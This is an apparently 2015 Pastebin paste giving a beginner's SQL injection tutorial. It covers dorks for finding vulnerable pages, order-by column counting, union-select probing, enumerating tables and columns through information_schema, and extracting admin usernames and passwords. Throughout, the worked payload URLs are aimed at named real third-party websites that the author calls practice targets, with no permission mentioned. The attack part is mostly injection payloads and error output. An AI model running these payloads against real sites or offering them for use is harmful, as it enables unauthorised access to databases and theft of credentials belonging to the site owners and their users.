Kyfx

SQL Manual Guide Lines 2015 should read

Mar 16th, 2015
434
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.37 KB | None | 0 0
  1. Sql- structured query language
  2. Vuln- vulnerable
  3. to start sql we should find 1st vuln site. In other word to inject a site you need to find a vuln site.
  4. To find vuln site we need to use 'Dork'
  5. which mean searching vuln site from googLe Using dork
  6. some of the dorks are here-
  7. Index.php?id=
  8. Event.php?id=
  9. News.php?id=
  10. This are the some example of dorks there are thousand of dorks to find vuln sites among them this are the some.. Now google this dork and open one site and put this sign after id=something it means
  11. Id=1'
  12. Id=20' don't change value after id=20 this is just an example to see either sites is vuln or not to inject.. So after putting this ' sign you will get sql error if you get sql error then it is vuln and those site which you find vuln
  13.  
  14. about sql part 2
  15. Time to learn next step of sql injection
  16. ‪#‎recall‬- in previous tutorial we learn to find vuln site yeah? Now we are upgrading the step now finding column of site is our next steP
  17. Vuln site- http://www.skitm.edu.in/faculty.php?id=2' this one is for n00b only kiss emoticon this site have very low security grin emoticon i practise in this site when i was learning sql injection tongue emoticon so here we go in our step grin emoticon
  18. To find column of the vuln site we have to use this query there are many query to find vuln column but because of the basic tut i am using here only: order by method smile emoticon
  19. Here is the query: order by
  20. Step- http://www.skitm.edu.in/faculty.php?id=2 order by 10
  21. Error: Unknown column '10' in 'order clause'
  22. Try until when this unknow column doesn't disappear from the screen grin emoticon
  23. Still getting that error yeah so try by putting 9 like this
  24. http://www.skitm.edu.in/faculty.php?id=2 order by 9
  25. Error: Unknown column '9' in 'order clause' still getting error yeah so try and try wink emoticon
  26. http://www.skitm.edu.in/faculty.php?id=2 order by 8
  27. Error: Unknown column '8' in 'order clause' again error tongue emoticon try until it disappear from your screen so keep on decreasing the number grin emoticon
  28. http://www.skitm.edu.in/faculty.php?id=2 order by 7
  29. Error: Unknown column '7' error
  30. http://www.skitm.edu.in/faculty.php?id=2 order by 6
  31. Error: Unknown column 6'
  32. http://www.skitm.edu.in/faculty.php?id=2 order by 5
  33. Error: Unknown column 5'
  34. http://www.skitm.edu.in/faculty.php?id=2 order by 4
  35. Error: Unknown column 4'
  36. http://www.skitm.edu.in/faculty.php?id=2 order by 3
  37. Error: Unknown column 3'
  38. http://www.skitm.edu.in/faculty.php?id=2 order by 2
  39. Error: Unknown column 2'
  40. http://www.skitm.edu.in/faculty.php?id=2 order by 2
  41. No Error in column 2'
  42. It mean this site have 2 column smile emoticon so finally we found column of that site.
  43. It is not mean that in all site there will be 2column in different site different column so don't keep on your mind that only 2 column in all vuln site now here we find column of site. And remember if last error is in 10 of any site then remember there is 9 column same as in next site if got last error in 26 then there is 25 column
  44.  
  45.  
  46.  
  47. site- we will practise in this site
  48. http://www.skitm.edu.in/faculty.php?id=2
  49. All step wise 1st we learn how to find either it is vuln or not yeah?
  50. Here we use method like this http://www.skitm.edu.in/faculty.php?id=2'
  51. getting sql error yeah? It mean this site is vuln.
  52. ‪#‎2nd‬ post
  53. in second step what we learn? we learn how to find vuln column? Like this http://www.skitm.edu.in/faculty.php?id=2 order by 3
  54. ‪#‎3rd‬ step is that to find vuln column tongue emoticon both are column but to find vuln column result in screen we need order by to get result in screen like shown in screenShOt,
  55. Here we go in step now smile emoticon
  56. 1) do you remember or not while we inject this site we got last error in 3 yeah? It mean here is 2 column now to display how many vuln column are there in screen we have to use following query smile emoticon
  57. http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
  58. What i have change in this site?
  59. => after id=parameter i haven't change there anything but i have put there sign '-' while using union select always remember to put that sign before parametEr.. smile emoticon
  60. how we will know that we have to put union select 1,2?
  61. => we have to use 1st order by method after knowing column vuln we have tO use according to vuln column value in union select..
  62. example-
  63. site- http://www.calidus.ro/
  64. vuln site http://www.calidus.ro/en/news.php?id=2
  65. To check the vuln column value in screen you will get some number in screen like 1,2,3 only one digit smile emoticon
  66. Another example
  67. http://www.calidus.ro/en/news.php…
  68. i got last error in 5 so i know now there is vuln in 4 so i use union select 1.2,3,4 and in screen i get vuln is column 2 smile emoticon
  69. ‪#‎remember‬ that when you use order by method and get vuln column according to it's value put it in union select grin emoticon
  70.  
  71.  
  72.  
  73. Today i am gonna teach you how to find
  74. => version
  75. => user
  76. => database
  77. All step those which we have learn wink emoticon
  78. 1st find site either it is vuln or not
  79. 1st step http://www.skitm.edu.in' => sql erro site is vuln
  80. 2nd step http://www.skitm.edu.in/faculty.php?id=-2 order by 2 using order by to find vuln colum value
  81. 3rd step http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
  82. ------all this step have been learn------
  83. today new step
  84. step to find version of the following site?
  85. http://www.skitm.edu.in/faculty.php…
  86. Q) how i do it? confused_rev emoticon
  87. => nothing new i have just put there version instead of putting there value 2
  88. why i put it in 2 only?
  89. => because while using union select 1,2 it display 2 as vuln column so i put it in value 2 to find version
  90. example if in some site if you find there vuln column in 9 then you need to do like this to find version
  91. union select 1,2,3,4,5,6,7,8,version(),10,11,12--
  92. example of site http://www.calidus.ro/en/news.php…--
  93. 2nd step to find user
  94. All method are same just change version() and instead of it put there user()
  95. like this
  96. http://www.skitm.edu.in/faculty.php…--
  97. All step are same so hope i don't have to tell about this and at last to find database
  98. we need to do same step change user into database then you will get result like this
  99. http://www.skitm.edu.in/faculty.php…--
  100.  
  101.  
  102.  
  103.  
  104. now i am going to teach that how to find the table me the this so this is the query +union+select+1,group_concat(table_name)%20from%20information_schema.tables
  105. after getting site is vuln or not try to use this query some site example are-
  106. Http://www.skitm.edu.in/faculty.php…
  107. use like this and get all site table smile emoticon
  108. We should now be able to see all
  109. the tables listed on one page,
  110. sometimes the last tableswill be
  111. cut off the end because a portion
  112. of the page will be covered in table
  113. names frominformation_schema which aren't useful for us so
  114. really, I usually prefer to display
  115. tablenames from the primary
  116. database rather than information_
  117. schema, we can do the following by using the +where+table_
  118. schema=database()
  119. command:where => A query for
  120. selectiontable_schema => Schema
  121. of tables from a databasedatabase
  122. () => In context the primary database, just leave it as it is.
  123. example - http://www.skitm.edu.in/faculty.php?id=-2+union+select
  124. +1,group_concat(table_name)+from
  125. +information_schema.tables+where
  126. +table_schema=database()
  127.  
  128.  
  129.  
  130. 1>how to find admin detail
  131. 2> admin column from selection table grin emoticon
  132. I hope you have understand all method smile emoticon
  133. to find table i have already teach so now time to learn about finding column
  134. ====>QUERY<=====
  135. +from
  136. +information_schema.columns
  137. where table_name=TableNameHEX
  138. example >
  139. -23+union+select
  140. +1,group_concat(column_name),3 from information_schema.columns
  141. where table_name=Admin
  142. ====>ERRoR<=====
  143. why we get error here you know? Because we haven't convert yet in hex to 'ADMIN'
  144. >>>so try this one query smile emoticon
  145. The HEX of Admin is:
  146. 41646d696eNow we must add 0x
  147. (MySQL integer) at the front of
  148. the HEX, which should now look
  149. like this: 0x41646d696eAnd pop it
  150. onto the end of the URL replacing Admin, so the URL should look
  151. something like the following.
  152. Example:wxw.site.com/index.php? Client_id=-23+union+select
  153. +1,group_concat(column_name),3 from information_schema.columns
  154. where table_name=0x41646d696e
  155. Real site example: i conver USER in hex and get this grin emoticon
  156. http://www.skitm.edu.in/faculty.php…
  157. So after finding table you have to choose the table and find it's column smile emoticon
  158. in every site don't use table in normal text
  159. whenever you want to find column of the site convert it in hex then only you can get value
  160.  
  161.  
  162. ------------------------------------------------------------------------------------------------------------------------------
  163.  
  164.  
  165. Query to find admin detail smile emoticon
  166. Example:www.site.com/index.php? Client_id=-23+union+select
  167. +1,concat
  168. (username,0x3a,password),3+from
  169. +Admin
  170. After doing all step this is one last step of basic sql smile emoticon after this you will get advance tut then this so try to be fully updateD.. smile emoticon
  171. So our target site is
  172. http://www.skitm.edu.in
  173. to find this site admin detail we will use following query smile emoticon
  174. http://www.skitm.edu.in/faculty.php?id=-2+union+select
  175. +1,concat
  176. (username,0x3a,password)+from
  177. +User
  178. don't put here username and password always because in every password and username will not work so to put correct one you need to find column of site and put there smile emoticon
  179. those result you get in column you need to put it here
Advertisement
Add Comment
Please, Sign In to add comment